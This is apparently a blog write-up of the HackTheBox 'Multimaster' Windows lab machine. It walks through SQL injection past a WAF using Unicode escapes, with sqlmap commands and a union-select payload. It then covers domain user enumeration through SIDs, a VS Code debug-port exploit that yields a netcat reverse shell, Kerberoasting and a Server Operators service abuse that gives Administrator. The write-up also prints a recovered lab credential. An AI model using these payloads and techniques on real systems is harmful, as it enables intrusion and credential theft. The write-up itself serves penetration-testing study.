[Updated] HackTheBox Multimaster Writeup – 10.10.10.179

HackTheBox Multimaster – 10.10.10.179 is an insanely difficult Windows machine by MinatoTW & egre55, released on 7th March.

The MultiMaster machine can simply be categorized as one of the hardest machines on HTB. The machine needs a lot of time to enumerate and understand how things work, and one needs to be patient while working on it. I took almost 8 to 9 days to complete the machine, and the time I spent was really worth it; I learned a lot.


The machine Cascade was released after MultiMaster, and I decided to work on Cascade first as it is an easy one. After publishing the Cascade writeup a couple of days ago, I started working on Multimaster. I'm in fact preparing this writeup along with my progress on the machine. I normally prepare notes and re-do the machine while preparing a writeup, but Multimaster is insane, so I decided to document the work as I went; here I present you my Multimaster writeup.

Important Note: I skipped a couple of steps where I thought it necessary, to confuse freebie flag takers. If you legitimately root this machine, you obviously know the steps I missed and the way I exploited it. 🙂

NMAP SCAN

As usual, I add the machine IP 10.10.10.179 to my hosts file as multimaster.htb. Next, I scan open ports and services using NMAP.


# root @ ns09 in ~/htb/multimaster [21:07:40] 
$ nmap -sC -A -v -oA scan multimaster.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-01 21:07 +03
Scanning multimaster.htb (10.10.10.179) [4 ports]
Completed Ping Scan at 21:07, 0.33s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 21:07
Scanning multimaster.htb (10.10.10.179) [1000 ports]
Discovered open port 3389/tcp on 10.10.10.179
Discovered open port 53/tcp on 10.10.10.179
Discovered open port 445/tcp on 10.10.10.179
Discovered open port 139/tcp on 10.10.10.179
Discovered open port 80/tcp on 10.10.10.179
Discovered open port 135/tcp on 10.10.10.179
Discovered open port 3269/tcp on 10.10.10.179
Discovered open port 88/tcp on 10.10.10.179
Discovered open port 389/tcp on 10.10.10.179
Discovered open port 636/tcp on 10.10.10.179
Discovered open port 3268/tcp on 10.10.10.179
Discovered open port 464/tcp on 10.10.10.179
Discovered open port 593/tcp on 10.10.10.179
Completed SYN Stealth Scan at 21:08, 26.90s elapsed (1000 total ports)
Initiating Service scan at 21:08
Scanning 13 services on multimaster.htb (10.10.10.179)
Completed Service scan at 21:10, 152.08s elapsed (13 services on 1 host)
Initiating OS detection (try #1) against multimaster.htb (10.10.10.179)
Retrying OS detection (try #2) against multimaster.htb (10.10.10.179)
Initiating Traceroute at 21:11
Completed Traceroute at 21:11, 0.24s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 21:11
Completed Parallel DNS resolution of 2 hosts. at 21:11, 0.01s elapsed
NSE: Script scanning 10.10.10.179.
Initiating NSE at 21:11
[2]    2296 segmentation fault  nmap -sC -A -v -oA scan multimaster.htb

As soon as the NMAP results were up, I understood this machine is different from most of the HackTheBox Windows machines. The NMAP result shows that the regular Windows AD-related ports, including 3389, 3268, 445, 88, 593 and 80, are open. The AD domain is MEGACORP.LOCAL and the machine seems to be Windows Server 2016 STD.

Port 80

Upon checking the website on port 80, it turns out to be an Employee Hub for a company called MegaCorp. There is a Gallery page, a Colleague Finder that returns the name and email address of employees, a corporate calendar and a login button that doesn't work.

As I mentioned above, my guess was right: this machine is not like the previous Windows machines, where the initial foothold was usually via one of the Impacket tools or gathering usernames from the website, etc. I tried to run Enum4Linux, but very little information was returned. I ran WFUZZ but couldn't find anything useful.

Since the list wasn't clear and the source code didn't seem to give a way in, I decided to run Burp Suite and get the user list from there, hoping to get more info if possible.

OK, much better now. After intercepting the request and sending a blank name, I got a better list of 17 users.

[{"id":1,"name":"Sarina Bauer","position":"Junior Developer","email":"sbauer@megacorp.htb","src":"sbauer.jpg"},{"id":2,"name":"Octavia Kent","position":"Senior Consultant","email":"okent@megacorp.htb","src":"okent.jpg"},{"id":3,"name":"Christian Kane","position":"Assistant Manager","email":"ckane@megacorp.htb","src":"ckane.jpg"},{"id":4,"name":"Kimberly Page","position":"Financial Analyst","email":"kpage@megacorp.htb","src":"kpage.jpg"},{"id":5,"name":"Shayna Stafford","position":"HR Manager","email":"shayna@megacorp.htb","src":"shayna.jpg"},
{"id":6,"name":"James Houston","position":"QA Lead","email":"james@megacorp.htb","src":"james.jpg"},
{"id":7,"name":"Connor York","position":"Web Developer","email":"cyork@megacorp.htb","src":"cyork.jpg"},
{"id":8,"name":"Reya Martin","position":"Tech Support","email":"rmartin@megacorp.htb","src":"rmartin.jpg"},
{"id":9,"name":"Zac Curtis","position":"Junior Analyst","email":"zac@magacorp.htb","src":"zac.jpg"},
{"id":10,"name":"Jorden Mclean","position":"Full-Stack Developer","email":"jorden@megacorp.htb","src":"jorden.jpg"},{"id":11,"name":"Alyx Walters","position":"Automation Engineer","email":"alyx@megacorp.htb","src":"alyx.jpg"},{"id":12,"name":"Ian Lee","position":"Internal Auditor","email":"ilee@megacorp.htb","src":"ilee.jpg"},
{"id":13,"name":"Nikola Bourne","position":"Head of Accounts","email":"nbourne@megacorp.htb","src":"nbourne.jpg"},{"id":14,"name":"Zachery Powers","position":"Credit Analyst","email":"zpowers@megacorp.htb","src":"zpowers.jpg"},{"id":15,"name":"Alessandro Dominguez","position":"Senior Web Developer","email":"aldom@megacorp.htb","src":"aldom.jpg"},{"id":16,"name":"MinatoTW","position":"CEO","email":"minato@megacorp.htb","src":"minato.jpg"},{"id":17,"name":"egre55","position":"CEO","email":"egre55@megacorp.htb","src":"egre55.jpg"}]

After a lot of trial and error, I noticed the application WAF can be bypassed using Unicode escape characters. I was able to bypass the WAF using a few Unicode escapes like \u0041, \u0042, \u0025, \u0100.

So that means the application can be exploited using SQL injection with the SQLMAP tamper script charunicodeencode. As per the HTB forum posts, the first approach is to dump the user credentials as hashes using SQLMAP and then crack them.

But I was uncertain where to start or what my point of attack was. After looking here and there, reading a couple of articles and getting a tip from TazWake, I was able to create a perfect SQLMAP command.

As advised by TazWake, I made sure to update my tamper script charunicodeencode.py to produce a Unicode payload.

Unicode escape character converter I used: https://dencode.com/en/string/unicode-escape
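The reason the escapes slipped through is that the WAF matched its blocklist against the raw request body, while the application's JSON parser decoded the \uXXXX escapes afterwards. This added illustration (my own code, not the Multimaster application's or its WAF's; the blocklist and request bodies are constructed) shows the weak check beside the corrected one, which inspects the values only after JSON decoding:

```python
import json
import re

# Constructed blocklist standing in for whatever pattern the real WAF enforced.
BLOCKED = re.compile(r"\b(union|select|xp_cmdshell)\b", re.IGNORECASE)


def waf_check_raw(body: str) -> bool:
    """Weak check: match the blocklist against the request body exactly as received.
    A JSON \\uXXXX escape for any letter never matches, because the WAF sees '\\u0055'
    where the application's JSON parser will later see 'U'. True means 'block'."""
    return BLOCKED.search(body) is not None


def _string_values(node):
    """Yield every string value in a decoded JSON document, at any depth."""
    if isinstance(node, dict):
        for v in node.values():
            yield from _string_values(v)
    elif isinstance(node, list):
        for v in node:
            yield from _string_values(v)
    elif isinstance(node, str):
        yield node


def waf_check_decoded(body: str) -> bool:
    """Corrected check: decode the JSON first so the WAF inspects the same values
    the application will hand to the database. Malformed JSON is rejected too."""
    try:
        data = json.loads(body)
    except ValueError:
        return True
    return any(BLOCKED.search(v) for v in _string_values(data))


# Constructed request bodies for the colleague-finder endpoint (not captured traffic).
BENIGN = '{"name": "Sarina"}'
PLAIN = '{"name": "x\' UNION SELECT 1,2,3,4,5-- -"}'
ESCAPED = '{"name": "x\' \\u0055NION \\u0053ELECT 1,2,3,4,5-- -"}'  # identical after JSON decoding

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("plain", PLAIN), ("escaped", ESCAPED)):
        print("%-8s raw=%-5s decoded=%s" % (label, waf_check_raw(body), waf_check_decoded(body)))
```

The same mismatch applies to any layer that inspects traffic in one encoding and consumes it in another; the fix is always to normalize to the consumer's view before matching.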

GETTING DATABASE AND TABLE NAMES

I made a fresh Burp POST request, copied the request into a text file and used it with SQLMAP. To find the database I used the following:

# root @ ns09 in ~/htb/multimaster [12:25:09] 
$ sqlmap -r target.txt --tamper charunicodeencode --dbs --delay 5
---
sqlmap -r target.txt --tamper charunicodeencode -D Hub_DB --tables --delay 5

Well, SQLMAP took some time and finally I had the database name (Hub_DB). I made the same request again, this time to obtain the table names.

OBTAINING USER CREDENTIALS IN HASHES

The waiting was really painful, since the WAF blocks too many requests and the exploit then fails. So I added a delay of 3 seconds to avoid the WAF blocking my attacks.

SQLMAP COMMAND:

sqlmap --tamper charunicodeencode --dbms=mssql -D Hub_DB -T Logins -C username,password --dump -r target.txt --delay 3

After waiting about 4 hours on my first attempt, I obtained the following hashes. The screenshot was taken while writing this blog post; I stopped the attack to continue writing. There were 17 hashes in total, and I found that 4 of the 17 are unique.

fb40643498f8318cb3fb4af397bbce903957dde8edde85051d59998aa2f244f7fc80dd2928e648465b8e7a1946a50cfa
cf17bb4919cab4729d835e734825ef16d47de2d9615733fcba3b6e0a7aa7c53edd986b64bf715d0a2df0015fd090babc
68d1054460bf0d22cd5182288b8e82306cca95639ee8eb1470be1648149ae1f71201fbacc3edb639eed4e954ce5f0813
9777768363a66709804f592aac4c84b755db6d4ec59960d4cee5951e86060e768d97be2d20d79dbccbe242c2244e5739

I used HASHCAT to crack the password:

It took another couple of minutes to crack the hash and get the password. However, the password didn't authenticate with any of the 17 users I had enumerated in previous attempts. It means those users are useless as of now.

I did a lot of trial and error again until I managed to find the required domain users: 2 service accounts and 7 users.

After reading a bunch of blog posts and nudges from HTB users, I understood that I need to get the SID of the domain. So back to Burp to generate the SID using the users I already have.

So back to https://www.branah.com/unicode-converter, and using the payload (below) I managed to get the SID of the domain MEGAMASTER.HTB.

-' union select 1,2,3,4,(select (select stuff(upper(sys.fn_varbintohexstr((SELECT SUSER_SID('MEGACORP\Domain Admins')))), 1, 2, ')))-- -

Converted Unicode:

I sent the request using Burp and here is the response with the Domain SID: 0x0105000000000005150000001C00D1BCD181F1492BDFC236

Along with a couple of HTB friends on Discord, we made a script to get domain users using the SID we just gathered.

$ python cracker.py
0x0105000000000005150000001C00D1BCD181F1492BDFC2364D040000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\DnsAdmins"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC2364E040000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\DnsUpdateProxy"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC2364F040000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\svc-nas"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC23651040000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\Privileged IT Accounts"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC23656040000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\tushikikatomo"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC23657040000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\andrew"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC23658040000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\lana"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC23635080000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\dai"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC23636080000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\svc-sql"}]
403 - Forbidden: Access is denied
403 - Forbidden: Access is denied
403 - Forbidden: Access is denied
0x0105000000000005150000001C00D1BCD181F1492BDFC2361D0C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\SQLServer2005SQLBrowserUser$MULTIMASTER"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC2361E0C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\sbauer"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC2361F0C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\okent"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC236200C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\ckane"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC236210C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\kpage"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC236220C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\james"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC236230C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\cyork"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC236240C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\rmartin"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC236250C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\zac"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC236260C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\jorden"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC236270C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\alyx"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC236280C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\ilee"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC236290C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\nbourne"}]
0x0105000000000005150000001C00D1BCD181F1492BDFC2362A0C0000 
[{"id":1,"name":"2","position":"3","email":"4","src":"MEGACORP\\zpowers"}]
Done Cracking
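The hex values above are raw binary SIDs as returned by SUSER_SID: a revision byte, a sub-authority count, a 48-bit big-endian identifier authority, then little-endian 32-bit sub-authorities, the last of which is the RID. This added decoder (my own code, not the writeup's cracker.py) converts them to the S-1-5-21-... form that the Get-ADUser output further down shows, and flags well-known RIDs; it assumes full SIDs, so note that the "Domain SID" value quoted earlier is only the 24-byte prefix (its count byte still says 5 but the trailing RID bytes were cut) and is rejected as malformed. The sample map below is constructed in the shape of the script output; the Administrator entry is not on the page.

```python
import struct

# Well-known domain-relative RIDs (documented by Microsoft); the page's output shows 500/501.
WELL_KNOWN_RIDS = {
    500: "Administrator", 501: "Guest", 502: "krbtgt",
    512: "Domain Admins", 513: "Domain Users", 514: "Domain Guests",
    518: "Schema Admins", 519: "Enterprise Admins",
}


def decode_sid(hex_sid: str) -> str:
    """Convert a hex-encoded binary SID (e.g. '0x0105...') to its 'S-1-5-...' string form."""
    raw = bytes.fromhex(hex_sid[2:] if hex_sid.lower().startswith("0x") else hex_sid)
    if len(raw) < 8:
        raise ValueError("SID header is 8 bytes; got %d" % len(raw))
    revision, sub_count = raw[0], raw[1]
    if len(raw) != 8 + 4 * sub_count:
        raise ValueError("header says %d sub-authorities but %d bytes follow" % (sub_count, len(raw) - 8))
    authority = int.from_bytes(raw[2:8], "big")        # 48-bit identifier authority, big-endian
    subs = struct.unpack("<%dI" % sub_count, raw[8:])  # sub-authorities are little-endian uint32
    return "S-%d-%d-%s" % (revision, authority, "-".join(map(str, subs)))


def encode_sid(sid: str) -> str:
    """Inverse of decode_sid: 'S-1-5-21-...' back to the 0x-prefixed hex form."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError("malformed SID string: %s" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    raw = bytes([revision, len(subs)]) + authority.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)
    return "0x" + raw.hex().upper()


def split_domain_rid(sid: str):
    """Split 'S-1-5-21-a-b-c-RID' into ('S-1-5-21-a-b-c', RID)."""
    parts = sid.split("-")
    if len(parts) < 8 or parts[:4] != ["S", "1", "5", "21"]:
        raise ValueError("not a domain SID with a RID: %s" % sid)
    return "-".join(parts[:-1]), int(parts[-1])


# Constructed sample in the shape of the script output above (Administrator entry is constructed).
SAMPLE = {
    "0x0105000000000005150000001C00D1BCD181F1492BDFC2364D040000": "MEGACORP\\DnsAdmins",
    "0x0105000000000005150000001C00D1BCD181F1492BDFC23651040000": "MEGACORP\\Privileged IT Accounts",
    "0x0105000000000005150000001C00D1BCD181F1492BDFC236F4010000": "MEGACORP\\Administrator",
}


def triage(sid_map):
    """Return (account, string SID, RID, well-known label or None) for each entry."""
    rows = []
    for hex_sid, account in sid_map.items():
        sid = decode_sid(hex_sid)
        _, rid = split_domain_rid(sid)
        rows.append((account, sid, rid, WELL_KNOWN_RIDS.get(rid)))
    return rows


if __name__ == "__main__":
    for account, sid, rid, label in triage(SAMPLE):
        print("%-35s %s  RID=%d %s" % (account, sid, rid, "(%s)" % label if label else ""))
```

The same decoder applies on the defensive side to SIDs found in Security event logs or ACL dumps, where a RID below 1000 or one of the well-known values deserves a second look.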

I made a list of users:

  • MEGACORP\DnsAdmins
  • MEGACORP\DnsUpdateProxy
  • MEGACORP\svc-nas
  • MEGACORP\Privileged IT Accounts
  • MEGACORP\tushikikatomo
  • MEGACORP\andrew
  • MEGACORP\lana
  • MEGACORP\dai
  • MEGACORP\svc-sql
  • MULTIMASTER
  • MEGACORP\sbauer
  • MEGACORP\okent
  • MEGACORP\ckane
  • MEGACORP\kpage
  • MEGACORP\james
  • MEGACORP\cyork
  • MEGACORP\rmartin
  • MEGACORP\zac
  • MEGACORP\jorden
  • MEGACORP\alyx
  • MEGACORP\ilee
  • MEGACORP\nbourne
  • MEGACORP\zpowers

Getting Users.txt Using Evil-WinRM

Once I had the AD user list it was just a matter of minutes to find the user.txt file. Out of the 9 users, the password "******1" paired with user tushikikatomo.

Credentials to use in Evil-WinRM:

tushikikatomo:************1

AND finally, after a long battle, I obtained user.txt. It has been a great machine so far, and a great learning tool for AD exploitation via SQLi; there are a couple of things I enjoyed which I had never tried before.

ON TO THE ROOT

As soon as I obtained the user, my next step was to see what user tushikikatomo is able to do on the MultiMaster system. I started to enumerate the system to find groups, users and running services on the box.

First thing to do after getting a low-privilege user: run WHOAMI /ALL from whatever shell you got and note down the group membership and privilege information of your compromised user.

Users:


# root @ ns09 in ~/htb/multimaster [14:50:51] 
$ ruby evil-winrm.rb -i multimaster.htb -u tushikikatomo -p *********
Evil-WinRM shell v1.8
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\alcibiades\Documents> Get-ADUser -Filter * -SearchBase "DC=MEGACORP,DC=LOCAL"
DistinguishedName : CN=Administrator,CN=Users,DC=MEGACORP,DC=LOCAL
Enabled           : True
GivenName         : 
Name              : Administrator
ObjectClass       : user
ObjectGUID        : 6c5bda1d-9908-40d8-b5f2-43b2000f7c75
SamAccountName    : Administrator
SID               : S-1-5-21-3167813660-1240564177-918740779-500
Surname           : 
UserPrincipalName : 
DistinguishedName : CN=Guest,CN=Users,DC=MEGACORP,DC=LOCAL
Enabled           : False
GivenName         : 
Name              : Guest
ObjectClass       : user
ObjectGUID        : 567071d7-37a9-475c-8f78-5eb3811da155
SamAccountName    : Guest
SID               : S-1-5-21-3167813660-1240564177-918740779-501
Surname           : 
UserPrincipalName : 
DistinguishedName : CN=DefaultAccount,CN=Users,DC=MEGACORP,DC=LOCAL
Enabled           : False
GivenName         : 
Name              : DefaultAccount
ObjectClass       : user
ObjectGUID        : 1d1114eb-b5d1-486a-b7dd-0d85c5ebaebb
SamAccountName    : DefaultAccount
SID               : S-1-5-21-3167813660-1240564177-918740779-503
Surname           : 
UserPrincipalName : 
----------------snip-------------
DistinguishedName : CN=Penelope Martin,OU=Frankfurt,OU=Employees,DC=MEGACORP,DC=LOCAL
Enabled           : True
GivenName         : Penelope
Name              : Penelope Martin
ObjectClass       : user
ObjectGUID        : 72b44502-30e3-4e13-9a37-ebf8fc14ad1d
SamAccountName    : pmartin
SID               : S-1-5-21-3167813660-1240564177-918740779-3117
Surname           : Martin
UserPrincipalName : pmartin@MEGACORP.LOCAL

Once I had the list of users, I proceeded to look at the groups residing in the AD.

# root @ ns09 in ~/htb/multimaster [14:55:06] 
$ ruby evil-winrm.rb -i multimaster.htb -u tushikikatomo -p ********
Evil-WinRM shell v1.8
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\alcibiades\Documents> get-adgroup -Filter *
DistinguishedName : CN=Administrators,CN=Builtin,DC=MEGACORP,DC=LOCAL
GroupCategory     : Security
GroupScope        : DomainLocal
Name              : Administrators
ObjectClass       : group
ObjectGUID        : e9d6125c-fce6-4b52-9058-201c781d1ed4
SamAccountName    : Administrators
SID               : S-1-5-32-544
DistinguishedName : CN=Users,CN=Builtin,DC=MEGACORP,DC=LOCAL
GroupCategory     : Security
GroupScope        : DomainLocal
Name              : Users
ObjectClass       : group
ObjectGUID        : a84ef90f-cbbc-4b25-b5cb-6d0763e02ce2
SamAccountName    : Users
SID               : S-1-5-32-545
=============SNIP====================
DistinguishedName : CN=test,OU=Groups,DC=MEGACORP,DC=LOCAL
GroupCategory     : Security
GroupScope        : Global
Name              : test
ObjectClass       : group
ObjectGUID        : faa08fa3-e051-4ca8-9ce2-cf06c91221d4
SamAccountName    : test
SID               : S-1-5-21-3167813660-1240564177-918740779-1602
DistinguishedName : CN=SQLServer2005SQLBrowserUser$MULTIMASTER,CN=Users,DC=MEGACORP,DC=LOCAL
GroupCategory     : Security
GroupScope        : DomainLocal
Name              : SQLServer2005SQLBrowserUser$MULTIMASTER
ObjectClass       : group
ObjectGUID        : d7ae6cab-8447-4623-839c-e9dc3044fbd4
SamAccountName    : SQLServer2005SQLBrowserUser$MULTIMASTER
SID               : S-1-5-21-3167813660-1240564177-918740779-3101
DistinguishedName : CN=Developers,OU=Groups,DC=MEGACORP,DC=LOCAL
GroupCategory     : Security
GroupScope        : Global
Name              : Developers
ObjectClass       : group
ObjectGUID        : 3a87c5ff-b156-4898-ad10-284489e07c15
SamAccountName    : Developers
SID               : S-1-5-21-3167813660-1240564177-918740779-3119

So now I have the user and group names on the box. This gives me an idea of the services running, and I can enumerate further who is who and who is capable of running what. After enumerating one by one, I found most of them are just default groups without any members.

SamAccountName    : Users
SamAccountName    : Guests
SamAccountName    : Print Operators
SamAccountName    : Backup Operators
SamAccountName    : Replicator
SamAccountName    : Remote Desktop Users
SamAccountName    : Network Configuration Operators
SamAccountName    : Performance Monitor Users
SamAccountName    : Performance Log Users
SamAccountName    : Distributed COM Users
SamAccountName    : IIS_IUSRS
SamAccountName    : Cryptographic Operators
SamAccountName    : Event Log Readers
SamAccountName    : Certificate Service DCOM Access
SamAccountName    : RDS Remote Access Servers
SamAccountName    : RDS Endpoint Servers
SamAccountName    : RDS Management Servers
SamAccountName    : Hyper-V Administrators
SamAccountName    : Access Control Assistance Operators
SamAccountName    : Remote Management Users
SamAccountName    : System Managed Accounts Group
SamAccountName    : Storage Replica Administrators
SamAccountName    : Domain Computers
SamAccountName    : Domain Controllers
SamAccountName    : Schema Admins
SamAccountName    : Enterprise Admins
SamAccountName    : Cert Publishers
SamAccountName    : Domain Admins
SamAccountName    : Domain Users
SamAccountName    : Domain Guests
SamAccountName    : Group Policy Creator Owners
SamAccountName    : RAS and IAS Servers
SamAccountName    : Server Operators
SamAccountName    : Account Operators
SamAccountName    : Pre-Windows 2000 Compatible Access
SamAccountName    : Incoming Forest Trust Builders
SamAccountName    : Windows Authorization Access Group
SamAccountName    : Terminal Server License Servers
SamAccountName    : Allowed RODC Password Replication Group
SamAccountName    : Denied RODC Password Replication Group
SamAccountName    : Read-only Domain Controllers
SamAccountName    : Enterprise Read-only Domain Controllers
SamAccountName    : Cloneable Domain Controllers
SamAccountName    : Protected Users
SamAccountName    : Key Admins
SamAccountName    : Enterprise Key Admins
SamAccountName    : DnsAdmins
SamAccountName    : DnsUpdateProxy
SamAccountName    : Privileged IT Accounts
SamAccountName    : test
SamAccountName    : SQLServer2005SQLBrowserUser$MULTIMASTER
SamAccountName    : Developers

In the next step, I tried to gather as much information as possible about group membership. Most of the default groups have Administrator as a member, but the group "Developers" seems to be a custom group with members aldom, cyork, jorden and sbauer.

*Evil-WinRM* PS C:\Users\alcibiades\Documents> Get-ADGroupMember Developers
distinguishedName : CN=Sarina Bauer,OU=New York,OU=Employees,DC=MEGACORP,DC=LOCAL
name              : Sarina Bauer
objectClass       : user
objectGUID        : 548955df-e515-41c1-9afa-8130103570e2
SamAccountName    : sbauer
SID               : S-1-5-21-3167813660-1240564177-918740779-3102
distinguishedName : CN=Connor York,OU=New York,OU=Employees,DC=MEGACORP,DC=LOCAL
name              : Connor York
objectClass       : user
objectGUID        : 6c3c78ec-7e0a-48be-95d7-edd410457515
SamAccountName    : cyork
SID               : S-1-5-21-3167813660-1240564177-918740779-3107
distinguishedName : CN=Jorden Mclean,OU=Athens,OU=Employees,DC=MEGACORP,DC=LOCAL
name              : Jorden Mclean
objectClass       : user
objectGUID        : 0fa62545-eff1-4805-b16f-a18cf4217418
SamAccountName    : jorden
SID               : S-1-5-21-3167813660-1240564177-918740779-3110
distinguishedName : CN=Alessandro Dominguez,OU=London,OU=Employees,DC=MEGACORP,DC=LOCAL
name              : Alessandro Dominguez
objectClass       : user
objectGUID        : 0d1589a0-e3ae-431b-8568-b99922fdc40f
SamAccountName    : aldom
SID               : S-1-5-21-3167813660-1240564177-918740779-3115

After more enumeration, I found user "jorden" is also a member of the "Server Operators" group, which means he probably has Administrator-level privileges.

*Evil-WinRM* PS C:\Users\alcibiades\Documents> Get-ADGroupMember "Server Operators"
distinguishedName : CN=Jorden Mclean,OU=Athens,OU=Employees,DC=MEGACORP,DC=LOCAL
name              : Jorden Mclean
objectClass       : user
objectGUID        : 0fa62545-eff1-4805-b16f-a18cf4217418
SamAccountName    : jorden
SID               : S-1-5-21-3167813660-1240564177-918740779-3110
distinguishedName : CN=Privileged IT Accounts,OU=Groups,DC=MEGACORP,DC=LOCAL
name              : Privileged IT Accounts
objectClass       : group
objectGUID        : 8504e2e0-c303-4043-a1f2-a2f591341e5e
SamAccountName    : Privileged IT Accounts
SID               : S-1-5-21-3167813660-1240564177-918740779-1105

The more I enumerated, the more lost I got. From the posts in the forum and a private Discord forum, I found that the box is vulnerable to VS Code LCE (Local Command Execution). I also confirmed this with fellow HTB users @maaaaaa and @peek. The huge task in front of me was to find the PoC for this vulnerability.

From PowerShell, I managed to gather the Code process information:

This machine is so frustrating that I actually held myself back for another 3 days without making much progress on Friday, Saturday and Sunday. But finally, I found the exploit most HTB users were talking about. It is the exploit by Francesco Soncina that exploits Visual Studio Code by connecting to its debug port and executing arbitrary commands. This exploit was assigned CVE-2019-1414 by Microsoft.

After going through the post, I figured out how the exploit works. The exploit needs a little trimming in order to execute it as per my requirement. Also, the exploit relies on the debug port being bound to 127.0.0.1, so it needs to be run from the Multimaster system itself.

I hosted a Python SimpleHTTPServer in my Multimaster working directory and placed my Netcat there. I updated the SpawnSync expression as per the code block below. On the other side, I uploaded the updated script to the Multimaster box using MSFconsole, and when all was set I executed the script. The exploit didn't work initially as I had issues in my SpawnSync; I took time to redo the script and rerun it, and as you see below I have the reverse shell as MS VS Code.

As I got the shell, I started to enumerate the wwwroot directory. I assumed that the web.config file should have database connection info and possibly a superuser password. However, although I was able to read web.config, I couldn't find anything useful.

My enumeration continued until I found the APIs. I read somewhere in the HTB forum that the BIN directory was supposed to have something useful, so I decided to download the following two files and review them.

  • MultimasterAPI.dll
  • MultimasterAPI.pdb

Downloading files:

After downloading the files, I used dnSpy to decompile the DLL. The API's HTTP POST class has a username and password.

finder:D3veL0pM3nT!

The username finder didn't get me an Evil-WinRM shell; after matching the password with the other users I got a shell as the user sbauer.

After spending a lot of time on sbauer and analysing, I understood the user sbauer is nothing but a gateway to root; I needed to find the right user and a privilege escalation path from my current user.

In the next step I was pretty much looking for help and collecting information here and there. A fellow Discord user suggested I upload SharpHound.ps1 and analyse the result; after analysing I found that the user sbauer has GenericWrite access over another user, jorden.

Next, it was straightforward: execute SharpHound and run a Kerberoast attack. Using the PowerView PowerShell script I was able to obtain the hash of the user jorden. The hash was later cracked to the password "r*********

Evil-WinRM to Shell The User Jorden

I opened another Evil-WinRM session to get a shell as the user jorden. The permission check revealed that jorden is a member of the security group "Server Operators".

SMB Server

I hosted an SMB server from the MultiMaster working directory where I placed Netcat.

NetCat Listener

I started a listener on a random port.

So from jorden I found the service that can be exploited. I referred to this article and used Netcat as the payload. When the service is restarted, boom, I have a reverse shell as Administrator in the listener.

That's it, I'm so relieved after completing this box. Thank you for reading.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

JJChang
1 month ago

hi man, how do you make SpawnSync execute your local nc.exe? I can't make it work.
